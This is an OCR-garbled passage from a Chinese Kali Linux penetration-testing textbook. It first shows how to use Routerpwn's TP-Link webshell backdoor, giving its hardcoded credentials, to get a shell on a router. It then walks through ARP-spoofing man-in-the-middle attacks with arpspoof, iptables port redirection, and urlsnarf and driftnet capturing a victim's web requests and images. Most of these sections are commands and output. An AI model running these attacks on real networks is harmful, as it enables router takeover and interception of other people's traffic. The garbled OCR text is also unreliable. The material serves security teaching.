Alcatel 


Comtrend Netgear TRENDnet 
DD-Wrt Pirelli Ubee 
D-Link RuggedCom Ubiquiti 

EE Sagem Unicorn 

EasyBox Seagate UTStarcom 

Fibrehome Siemens Xavi 

Freebox Sitecom ZyXEL 
Huawei SMC ZTE 
MiFi Thomson Zoom 
Motorola TP-Link 


Lucent 
Alpha 
Asmax 
Asus 
Belkin 
Cisco 


图 9.42 Routerpwn 主页 面 


从 该 界面 可 以 看 到 有 很 多 厂商 的 路 由 器 ， 如 国内 常用 的 D-Link, Huawei, Netgear 和 
TP-Link 等 。 根 据 上 自己 的 目标 路 由 器 选择 相应 生产 厂商 ， 这 里 选择 TP-Link， 将 显示 如 图 
9.43 所 示 的 界面 。 


TP-LINK 


TD-8817, TD-W8901G, WDR740N, WR743ND, WR842ND, WA-901ND, 
WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, 
WR841N, TD-8840T , WDR740N, WDR740D 


05/26/12 [*] TP-Link WDR740ND/WDR740N - Directory Traversal [SET IP] 
01/14/14 [*] TD-8840T - Reset Password to Blank [SET IP] 
08/06/13 [+] | WR1043ND denial of service [SET IP] 
08/06/13 [*] WR1043ND enable root filsystem on FTP CSRF [SET IP] 
04/06/13 [+] | TD-8817 TD-W8901G blank admin password CSRF [SET IP] 


05/26/12 [*] Webshell backdoor (user: osteam password: 5up) [SET IP] 


^ Top 


图 9.43 SR WE G AR dir] 
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从 该 界面 可 以 看 到 支持 有 十 六 种 型 号 的 TP-LINK 路 由 器 及 可 利用 的 漏洞 。 在 路 由 器 漏 
洞 列 表 中 显示 了 漏洞 日 期 、 漏 洞 描述 信息 和 一 个 选项 [SET IP]。 该 选项 是 用 来 设置 目标 路 
由 器 的 IP. 

【实例 9-6】 利用 Webshell backdoor 漏洞 ， 获 取 一 个 远程 路 由 右 〈( 本 例 中 路 由 器 人 地 
HEX 192.168.0.1) 命令 行 。 具 体操 作 步 又 如 下 所 示 。 

(1) 在 图 9.43 中 单 击 [SET IP] 按 钮 ， 将 弹出 一 个 对 话 框 ， 如 图 9.44 所 示 。 

(2) 在 该 对 话 框 中 ， 输 入 要 攻击 的 路 由 器 的 IP 地址 。 然 后 单 击 “确定 ”按钮 ， 将 弹出 
如 图 9.45 所 示 的 对 话 框 。 


需要 进行 身份 验证 


服务 器 http://192.168.0.1:30 要 求 用 户 罗 入 用 户 名 和 密码 。 
服务 器 得 示 : TP-LINK Wireless N Router WR1041N, 


routerpwn.com 上 的 网 页 显示 : 


BAZ: admin 
Do 
We || m | wm || m 
图 9.44 输入 目标 路 由 器 IP 地 址 图 9.45 登录 路 由 器 对 话 框 


G) 在 该 界面 输入 登录 路 由 器 的 用 户 名 和 密码 ， 一 般 路 由 帮 上 默认 的 用 户 名 和 密码 是 
admin。 然 后 单 击 “ 登录” 按钮 ， 将 显示 如 图 9.46 所 示 的 界面 。 


| 查看 内 核 模块 | 

| TEPKI | 

IM 
查看 ARP 


; 


图 9.46 命令 行 界面 


(4) 此 时 ， 在 该 界面 可 以 执行 一 些 查 看 路 由 器 信息 的 命令 ， 如 查看 进程 、 网 络 、 路 由 
KAI NAT 等 。 或 者 直接 单 击 图 9.46 中 右 侧 栏 的 按钮 查看 相关 信息 。 在 该 界面 执行 命令 时 ， 
需要 输入 用 户 名 和 密码 。 这 里 的 用 户 名 和 密 人 码 是 Routerpwn 网 站 中 Webshell backdoor 漏洞 
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提供 的 用 户 名 和 密码 Costeam 和 Sup) 。 例 如 ， 单 击 “ 查 看 网 络 ” 按 钮 ， 将 显示 如 图 9.47 
所 示 的 界面 。 


osteam 
| NE NN 


Link encap:Ethernet HWaddr 6C:E8:73:F9:3C:CO0 

inet addr:192.168.0.1  Bcast:192. 168.0. 255 Mask:255. 255. 255. 0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:221877601 errors:0 dropped:0 overruns:0 frame:0 

TX packets: 244867896 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 


RX bytes:1780662856 (1.6 GiB) TX bytes:2348209445 (2.1 GiB) 


Link encap:Ethernet  HWaddr 00:03: TF:FF:FF:FF 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:31374498 errors:0 dropped:36002 overruns:0 frame: 0 
TX packets: 26320788 errors:0 dropped:l overruns:9613 carrier:0 
collisions:0 txqueuelen: 900 

RX bytes:1942057706 (1.8 GiB) TX bytes:1137624415 (1.0 GiB) 


查看 进程 


查看 网 络 
Link encap:Ethernet HWaddr 6C:E8:73:F9:3C:CO0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 查看 路 由 
RX packets:221878395 errors:0 dropped:0 overruns:0 frame:0 
TX packets: 244867896 errors:0 dropped:0 overruns:0 carrier:0 查看 NAT 


collisions:0 txqueuelen:0 
RX bytes: 2668220808 (2.4 GiB) TX bytes:3327681029 (3.0 GiB) 查看 内 存 


Link encap:Ethernet HWaddr 6C:E8:73:F9:3C:C1 查看 内 核 模块 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets: 244353222 errors:0 dropped:0 overruns:0 frame:0 E E p^ tis 
TX packets:217660508 errors:0 dropped:0 overruns:0 carrier:Ü 


4 


图 9.47 路 由 器 的 网 络 连接 信息 


C5) 从 该 界面 可 以 看 到 路 由 器 中 , 所 有 连接 的 网 络 接口 信息 ， 如 接口 的 了 P 地址 、MAC 
地 址 和 传输 速率 等 。 如 果 想 要 通过 执行 命令 查看 ， 则 在 指令 框 中 输入 ifconfig 命令 。 然 后 
单 击 “发 送 ” 按 钮 ， 如 图 9.48 所 示 。 


[) TL-WR1041N x 


订户 名 osteam 
[上 -条 |_ 下 -条 _ 
指令 : litconfig | RE | 清空 | 退出 | 


图 9.48 运行 命令 查看 网 络 信息 
(6) 在 该 界面 单 击 “发 送 ” 按 钮 后 ， 输 出 的 信息 和 图 9.47 中 的 信息 一 样 。 


9.8 Arpspoof 工具 


Arpspoof 是 一 个 非常 好 的 ARP 欺骗 的 源 代 人 码 程序 。 它 的 运行 不 会 影响 整 个 网 络 的 通 
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童 ， 讽 工具 通过 蔡 换 传输 中 的 数据 从 而 达到 对 目标 的 欺骗 。 本 节 将 介绍 Arpspoof 工具 的 
使 用 。 


9.8.1 URL 流量 操纵 攻击 


URL 流量 操作 非常 类 似 于 中 间 人 攻击 ， 通 过 目标 主机 将 路 由 流量 注入 到 因特网 。 该 过 
程 将 通过 ARP 注入 实现 攻击 。 本 小 节 将 介绍 使 用 Arpspoof 工具 实现 URL 流量 操纵 攻击 。 
使 用 Arpspoof 工具 实现 URL 流量 操作 攻击 。 有 具体 操作 步骤 如 下 所 示 : 

(D 开局 路 由 转发 功能 。 执 行 命令 如 下 所 示 : 


root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward 


执行 以 上 命令 后 ， 没 有 任何 信息 输出 。 

(2) 局 动 Arpspoof 注入 攻击 目标 系统 。 攻 击 的 方法 是 攻击 者 〈192.168.6.102) 发 送 
ARP 数据 包 ， 以 欺骗 网 关 (192.168.6.1) 和 目标 系统 (192.168.6.101) 。 下 面 首先 欺骗 日 
标 系 统 ， 执 行 命 令 如 下 所 示 : 

root@kali:~# arpspoof -i ethO -t 192.168.6.101 192.168.6.1 

50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 

50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 

50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 


50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 


fan tb A fei A oS Y XX dich d Hobs EL 192.168.6.102 5 3% H Xx ds E. Hn 
50:e5:49:eb:46:8d 表示 攻击 者 的 MAC 地 址 ; 19:21:3£c3:e5 表示 192.168.6.101 的 MAC 地 址 。 
当 以 上 过 程 攻 击 成 功 后 ， 目 标 主机 192.168.6.101 给 网 关 192.168.6.1 发 送 数据 时 ， 都 将 发 
送 到 攻击 者 192.168.6.102 上 。 

(3) 使 用 Arpspoof 注入 攻击 网 天 。 执 行 命令 如 下 所 示 : 

root@kali:~# arpspoof -i ethO -t 192.168.6.1 192.168.6.101 

50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 

50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 

50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 

50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 


50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 


以 上 输出 信息 显示 了 攻击 者 问 网 天 192.168.6.1 发 送 的 数据 包 。 当 该 攻击 成 功 后 ， 网 关 
192.168.6.1 发 给 目标 系统 192.168.6.101 上 的 信息 发 送 到 攻击 者 主机 192.168.6.102 上 。 

(4) 以 上 步骤 都 执行 成 功 后 ， 攻 击 者 驶 相当 于 控制 了 网 关 与 目标 主机 传输 的 数据 。 攻 
击 者 可 以 通过 收 到 的 数据 ， 查 看 到 目标 系统 上 重要 的 信息 。 

为 了 验证 以 上 的 信息 ， 下 面 举 一 个 简单 的 例子 。 

【实例 9-7】 通过 使 用 Wireshark 抓 包 验证 Arpspoof 工具 的 攻击 。 有 具体 操作 步骤 如 下 
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FZR o 
(1) 启动 Wireshark 工具 。 在 Kali Linux RMK REFE “HFEF” [Kali Linux|Top 10 
Security Tools|wireshark 命令 ， 将 显示 如 图 9.49 所 示 的 界面 。 


The Wireshark Network Analyzer [Wireshark 1.10.2 (SVN Rev 51934 from /tr 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
Bdlahixe¢iaearF ct Ee - 


Filter: | v Expression... v 


The World's Most Popular Network Protoco 


WIRESHARK Version 1.10.2 (SVN Rev 51934 from /trunk-1.10) 


. Interface List = Open 


— Lvelist of the capture interfaces Opena previously captured file 
(counts incoming packets) 
Open Recent: 
4 Start 'root/Desktop/aa.pca [not found] 


f Choose one or more interfaces to capture from, then Start /root/targethost.pcap (22 kB) 


ff] ethO 'tmp/targethost.pcap [not found] 
ff] nflog 
fP] any 


Ready to Load or capture 3 No... : Profile: Default 


© Sample Captures 


图 9.49 Wireshark 启动 界面 


(2) 在 该 界面 Start 下 面 ， 选 择 要 捕获 的 接口 。 这 里 选择 eth0， 然 后 单 击 Start 按钮 ， 
将 显示 如 图 9.50 所 示 的 界面 。 


*ethO [Wireshark 1.10.2 (SVN Rev 51934 from /trunk-1.10)] 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
eodm:menxeone»s^tTtrtJ:- 


Filter: | v | Expression... v 


| | | | 
No. Time Source Destination Protocol Le 


Broadcast 


ooo0 ff ff ff ff ff ff OO 50 56 cO OO 08 08 O6 OO Ol 
0010 08 OO O6 04 OO Ol OO 50 56 cO OO 08 cO a8 29 Ol 
0020 00 OO OO OO OO OO cO a8 29 02 OO OO OO OO OO OO 


Q9 File: "Itmp/wireshark. pcapng. ethO... :...: Profile: Default 


图 9.50 抓 包 界面 
(3) 该 界面 可 以 对 Wireshark 进行 相关 设置 及 局 动 、 停 止 和 刷新 数据 包 。 
(4) 在 目标 系统 192.168.6.101 上 ping 网 关 192.168.6.1。 执 行 命令 如 下 所 示 : 
C:\Users\Administrator>ping 192.168.6.1 
以 上 命令 执行 完 后 ， 到 Kali 下 但 看 Wireshark 抓 取 的 数据 包 ， 如 图 9.51 Pras. 
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| *ethO [Wireshark 1.10.2 (SVN Rev 51934 from /trunk-1.10)] ux 


File Edit View Go Capture Analyze Statistics “elephory Tools Internals Help 
eeodm-^maenxeae»atsbEBissHEWENES- 


Filter: v | Expression. . Clear Apply RF 


| | 
No. Time Source Destination Protocol Lengt! Info 


28 2014-05-14 07:15:38 192.168.6.101 192.168.6.1 ICM? 74 Ecko (p:nc) request :dz0x23001, seq=13/3328, ttl-128 


| | IC Reci : irect host | 
30 2014-05-14 à: 15:38 192.168.6.101 192.168.6.1 ICM? 74 Ecko (p-nc) request -d-0x23001, seq=13/3328, ttl=127 
31 2014-05-14 07:15:38 192.168.6.1 — 192.168.6.101 ICM> 74 Ecko (p-nc) reply :d-0x23001, s2q=13/3328, ttl-64 

| | 07: 68.6. 11 ICM: ! Recirec- Redirect for host) 


33 2014-05-14 07:15:38 192.168.6.1 — 192.168.6.101 ICM> 74 Ecko (p-nc) reply -d=0x9001, s2q=13/3328, ttl-63 


+ Frame 28: 74 byzes on wire (592 bits), 74 bytes captured 1592 bizs) on -nterface O 

( Ezhernet II, Sre: Llitegro 3f:c23:e5 [00:19:21:3f:c3:e5), Dst: Ciga-Dyt eb:46:0d (S0:e5:49:eb: 46: Gd) 
+ Inlernel Prolocol Vers.or 4, Src: 192.168.6.101 (192.168.6.101), Dsl: 192.168.6. “pp (192. 168.6.1) 

* Internet Ccntro. Message Protoccl 


OCOO 50 e5 49 eb 46 8d O0 19 21 3f c3 e5 C8 00 45 00  F.I.F... !?....E. 


OC30 67 60 69 Ea 6b Gc Gd Ge Gf 70 71 72 73 74 7€ 76 ghijklmn opqrstuv 
上 YW d  -—À 


I — m 


OClO 00 3c 03 aa 00 OC 80 01 a9 60 cO a8 C6 65 cC a8 人。 c saco, 
OC2O 06 Ol O8 CO 4d 4e O0 O01 OO Od 61 62 €3 64 65 66 ....MN.. .. abcdef 


OM File: "/tmp/wireshzrk pcapng. ethO... ` Packets: 83 - Displayed: 83 (100.0%) - Dropped: 0 (... - Profile: Default 


图 9.51 捕获 的 数据 包 


(5) 该 界面 显示 了 192.168.6.101 与 192.168.6.1 之 则 数据 传输 的 过 程 。 其 中 传输 整个 
sa ee ALE, E TH 
详细 分 析 捕 获 的 数据 包 。 

28: 表示 192.168.6.101 ( 源 ) 向 192.168.6.1〈 目 标 ) 发 送 ping 请 求 。 

29: 表示 192.168.6.102 将 192.168.6.101 的 数据 包 进 行 转发 。 

30: 表示 192.168.6.102 将 转发 后 的 数据 包 ， 再 癌 192.168.6.1 发 送 请 求 。 

: 表示 目标 主机 192.168.6.1 响应 192.168.6.101 的 请 求 。 

32: 表示 该 响应 被 发 送 到 192.168.6.102 上 ， 此 时 该 主机 转发 到 192.168.6.1. 
33: 目标 主机 192.168.6.1 将 转发 的 数据 发 送 给 192.168.6.101 上 。 


DOOOodL 
= 


98.2 ”端口 重 定向 攻击 


端口 重 定向 又 叫 端口 转发 或 端口 映射 。 端 口 重 定 问 接收 到 一 个 端口 数据 包 的 过 程 ( 如 
80 端口 ) ， 并 且 重 定向 它 的 流量 到 不 同 的 端口 (如 8080) 。 实 现 这 类 型 攻击 的 好 处 就 是 可 
以 无 止境 的 ， 因 为 可 以 随 着 它 重 定 问安 全 的 端口 到 未 加 密 端 口 ， 重 定 问 流 量 到 指定 设备 的 
一 个 特定 端口 上 。 本 小 节 将 介绍 使 用 Arpspoof 实现 病 口 重 定 癌 攻 击 。 使 用 Arpspoof 实现 
端口 重 定 回 攻击 。 有 具体 操作 步骤 如 下 所 示 。 

(D 开局 路 由 转发 攻击 。 执 行 命令 如 下 所 示 : 


root@kali:~# echo 1 >> /proc/sys/net/ipvA/ip forward 
(2) 局 动 Arpspoof 工具 注入 流量 到 默认 网 络 。 例 如 ， 本 例 中 的 默认 网 基地 址 为 
192.168.6.1。 执 行 命令 如 下 所 示 : 


root@kali:~# arpspoof -i ethO 192.168.6.1 


在 Kali Linux 上 执行 以 上 命令 后 ， 没 有 任何 输出 信息 。 这 是 Kali 1.0.6 上 的 一 个 bug， 
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因为 在 该 系统 中 dsniff 软件 包 的 版 本 是 dsniff-2.4b1l+debian-22。 执 行 arpspoof 命令 不 指定 
目标 系统 时 ， 只 有 在 dsniff 软件 包 为 dsniff-2.4bl-debian-21.1 上 才 可 正常 运行 。 

(3) 添加 一 条 闯 口 重 定 癌 的 防火 声 规 则 。 执 行 命 令 如 下 所 示 : 

root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -| REDIRECT --to-port 


8080 
执行 以 上 命令 后 ， 没 有 任何 输出 。 


以 上 设置 成 功 后 , 当 用 户 向 网 关 192.168.6.1 的 80 端口 发 送 请 求 时 ,将 会 被 转发 为 8080 


端口 发 送 到 攻击 者 主机 上 。 


9.8.3 ”捕获 并 监视 无 线 网 络 数 据 


使 用 中 间 人 攻击 的 方法 ， 可 以 使 Kali Linux 操作 系统 处 在 目标 主机 和 路 由 器 之 间 。 这 
样 ， 用 户 就 可 以 捕获 来 日 目标 主机 的 所 有 数据 。 本 小 节 将 介绍 通过 使 用 Arpspoof 工具 实施 
中 间 人 攻击， 进而 捕获 并 监视 无 线 网 络 数据 。 

(1) 开局 路 由 器 转 发 功能 。 执 行 命令 如 下 所 示 : 

root@Kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward 


(2) 使 用 Arpspoof 命令 攻击 主机 。 执 行 命令 如 下 所 示 : 
root@kali:~# arpspoof -i ethO -t 192.168.6.106 192.168.6.1 


0:¢:29:7a:59:75 0:¢:29:fc:a9:25 0806 42: 
0:c:29:7a:59:75 0:¢:29:fc:a9:25 0806 42: 
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: 
0:¢:29:7a:59:75 0:¢:29:fc:a9:25 0806 42: 
0:¢:29:7a:59:75 0:¢:29:fc:a9:25 0806 42: 
0:¢:29:7a:59:75 0:¢:29:fc:a9:25 0806 42: 
0:¢:29:7a:59:75 0:c:29:fc:a9:25 0806 42: 
0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: 
0:¢:29:7a:59:75 0:¢:29:fc:a9:25 0806 42: 


arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 
arp reply 192.168.6.1 is-at 0:c:29:/a:59:75 
arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 
arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 
arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 
arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 
arp reply 192.168.6.1 is-at 0:c:29:/a:59:75 
arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 
arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 


执行 以 上 命令 表示 告诉 192.168.6.(106 C H bx EAL) ， 网 关 的 MAC 地 址 是 
00:0c:29:7a:59:75 (攻击 主机 ) 。 当 目标 主机 收 到 该 消息 时 ， 将 会 修改 ARP 缓存 表 中 对 应 
的 网 关 ARP 和 条目。 执行 以 上 命令 后 ， 不 会 目 动 停止 。 如 果 不 需 要 攻击 时 ， 按 下 CtrltC 组 


合 键 分 止 攻击 。 


(3) 查看 目标 主机 访问 URL 地 址 的 信息 。 执 行 命 令 如 下 所 示 : 


root@kali:~# urlsnarf -i ethO 


urlsnarf: listening on ethO [tcp port 80 or port 8080 or port 3128] 
192.168.6.106 - - [16/Jul/2014:13:12:30 +0800] "GET http://192.168. 6.1:1900/igd.xml HTTP/1.1" - 


- "-" "Microsoft-Windows/6.1 UPnP/1.0" 


192.168.6.106 - - [16/Jul/2014:13:12:30 +0800] "GET http://192.168. 6.1:1900/I3f.xml HTTP/1.1" - 


- "-" "Microsoft-Windows/6.1 UPnP/1.0" 


192.168.6.106 - - [16/Jul/2014:13:12:30 +0800] "GET http://192.168. 6.1:1900/ifc.xml HTTP/1.1" - 


- "-" "Microsoft-Windows/6.1 UPnP/1.0" 


192.168.6.106 - - [16/Jul/2014:13:12:33 +0800] "GET http://192.168. 6.1:1900/ipc.xml HTTP/1.1" - 


- "-" "Microsoft-Windows/6.1 UPnP/1.0" 


192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "GET http://192.168. 6.1:1900/igd.xml HTTP/1.1" - 
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- "^" "Microsoft-Windows/6.1 UPnP/1.0" 

192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168. 6.1:1900/ipc HTTP/1.1" - - 
"-" "Microsoft-Windows/6.1 UPnP/1.0" 

192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168. 6.1:1900/ifc HTTP/1.1" - - 
"-" "Microsoft-Windows/6.1 UPnP/1.0" 

192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168. 6.1:1900/ipc HTTP/1.1" - - 
"-" "Microsoft-Windows/6.1 UPnP/1.0" 

192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168. 6.1:1900/ifc HTTP/1.1" - - 
"." "Microsoft-Windows/6.1 UPnP/1.0" 


以 上 输出 的 信息 显示 了 目标 主机 访问 互联 网 的 信息 。 

(4) 用 户 还 可 以 使 用 Driftnet 工具 ， 捕 获 目 标 系 统 浏览 过 的 图 片 。 执 行 命令 如 下 所 示 : 

root@kali:~# driftnet -i ethO 

执行 以 上 命令 后 ， 将 会 打开 一 个 窗口 。 当 目标 主机 访问 到 网 页 中 有 图 请 时， 将 会 在 该 
I 口 中 mi ZR : 

(5) 现在 到 目标 主机 上 ， 访问 互联 网 以 产生 捕获 信息 。 例 如 ， 随 便 在 目标 主机 上 通过 
Dy a DG ARTS d Va, Bod ESR Ae üt S] 9.52 所 示 的 界面 。 


driftnet — |O | x 


图 9.52 目标 主机 访问 的 图 片 


C6) 该 界面 显示 了 目标 主机 上 访问 的 所 有 图 片 。 现 在 用 户 可 以 通过 点 击 图 9.52 中 的 任 
何 一 张 图 片 ， 该 图 片 将 被 保存 到 Kali 主机 上 。 此 时 driftnet 命令 下 ， 将 会 出 现 如 下 所 示 的 
信 AA : 

root@kali:~# driftnet -i ethO 

driftnet: saving /tmp/drifnet-YbOziq/driftnet-53c9d45c168e121f.png' as driftnet-0.png' 

driftnet: saving /tmp/drifnet-YbOziq/driftnet-53c9d45c168e121f.png' as driftnet-1.png' 

driftnet: saving '/tmp/drifnet-YbOzig/driftnet-53c9d4ca5d888a08.jpeg' as driftnet-2 .jpeg' 

driftnet: saving /tmp/drifnet-YbOziq/driftnet-53c9d4d92a6de806.png' as driftnet-3.png' 


driftnet: saving /tmp/drifnet-YbOzig/driftnet-53c9d4d92a6de806.png' as driftnet-4.png' 
driftnet: saving /tmp/drifnet-YbOziq/driftnet-53c9d5351a9a9e69.png' as driftnet-5.png' 


从 上 面 可 以 看 到 ， 保 存 了 driftnet 捕获 到 的 7 张 图 片 。 其 文件 名 分 别 为 driftnet-* png, 
并 且 这 些 文 件 默认 保存 当前 目录 下 。 
CI) 用 户 可 以 使 用 Linux Bat Bg evi 2s fre. ul 9.53 所 示 。 


wi 
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图 像 (|) ”编辑 (E) 


driftnet-4.jpeg 
宽度 : 

121 像素 
高 度 : 

75 像素 
类 型 : 

JPEG Image 
文件 大 小 : 

11.1 KB 
文件 夹 : 


driftnet-4.jpeg = Oo |x 


Ww" ercucrearTiow TESTINA 


AAS.1821 14 


121 x 75 像素 111KB 400% 


图 9.53 捕获 的 图 片 


(8) 该 界面 显示 的 是 第 四 张 图 片 。 用 户 可 以 通过 单 击 “ 下 一 张 ” 或 “上 一 张 ” 投 钮 ， 


切换 捕获 到 的 图 片 。 
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